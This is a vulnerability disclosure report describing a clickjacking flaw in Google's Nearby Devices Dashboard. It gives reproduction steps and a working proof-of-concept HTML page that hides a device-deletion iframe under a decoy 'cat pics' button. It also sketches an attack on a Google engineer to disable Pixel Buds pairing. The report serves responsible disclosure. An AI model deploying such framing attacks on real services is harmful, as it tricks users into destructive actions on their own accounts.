Summary:
Clickjacking is possible on the Nearby Devices Dashboard. Using this, (among other things) an attacker could create a malicious webpage which can trick a victim into deleting his/her own device.
POC Video:
https://youtu.be/kqfsgEJjgEM (00:15) (music)
Core Issue:
The Nearby Devices Dashboard page on https://developers.google.com/nearby/devices/ actually embeds https://developers-dot-devsite-v2-prod.appspot.com/nearby/devices/index_c4c5649698417947f28fa2ba0f3267ae10a9a13b3b687a720a65984cfff9e812.frame, which displays the Dashboard. This host behaves just like developers.google.com, but looks like an AppEngine App.
The host developers-dot-devsite-v2-prod.appspot.com doesn’t have any framing protections.
When a victim uses the Nearby Devices Dashboard, she has to log in. When she logs in, since the whole Dashboard is in an iframe, the login cookies get set on developers-dot-devsite-v2-prod.appspot.com.
So, its possible to embed developers-dot-devsite-v2-prod.appspot.com, and a victim will have valid cookies, so the embedded frame will be logged in.
Steps to reproduce:
- Create/log into a Google account
- Go to
https://developers.google.com/nearby/devices/, log in, and create a GCP project when prompted - Go to
Add Device, and create a new device. (ChooseFast Pair->Headphonesfor the least required fields & You must upload an 512x512 image) - Convert the new device’s
Model IDfrom hex to decimal (e.g. for the Pixel Buds:0x92BBBD->9616317) - Open the POC HTML file from below, and add the ID after the
#sign in the URL (e.g.poc.html#9616317) - When the POC loads, see that the device management page got embedded, and clicking the
Click here for cat pics!!deletes the victim’s device
POC Code:
<html>
<body>
<button id="button" style="pointer-events: none;z-index:1;left:460px;position:relative;top:-330px;background-color: greenyellow;"><b>Click here for<br/>cat pics!!</b></button>
<iframe id="iframe" width=500px height=500px style="opacity: 0.1;"></iframe>
</body>
<script>
document.getElementById("iframe").src = "https://developers-dot-devsite-v2-prod.appspot.com/nearby/devices/index_c4c5649698417947f28fa2ba0f3267ae10a9a13b3b687a720a65984cfff9e812.frame#/devices/view/" + window.location.hash.substring(1);
window.addEventListener("blur", function(){
var elem = document.createElement('iframe');
elem.style.cssText = 'position:absolute;width:50%;height:50%;z-index:100';
elem.src = "https://www.youtube.com/embed/5wOXc03RwVA?autoplay=1"
document.body.appendChild(elem);
});
</script>
</html>
Real-world Attack:
Attacker wants to delete the second generation Pixel Buds device, to cause a DOS for users who want to pair with it.
- Attacker buys a Pixel Buds
- From the BLE advertisements, Attacker notes that the Pixel Buds has a
Model IDof0x92BBBD - Attacker converts this ID to decimal
0x92BBBD->9616317 - Attacker sets up the POC, and sends the malicious link (
poc.html#9616317) to a Google Engineer who is logged into the Nearby Devices Dashboard and has access to the Pixel Buds device - If the Google Engineer clicks
Click here for cat pics!!, the Pixel Buds device gets deleted, probably causing a DOS/other issues for users who want to pair with their Pixel Buds
[Disclosure Warning]:
This issue is subject to a 90 day disclosure deadline. On 2021-05-17 this issue will be publicly disclosed. If you would like to redact additional information or if for some reason the issue can’t be fixed until the deadline, let me know in a comment.
Thank you!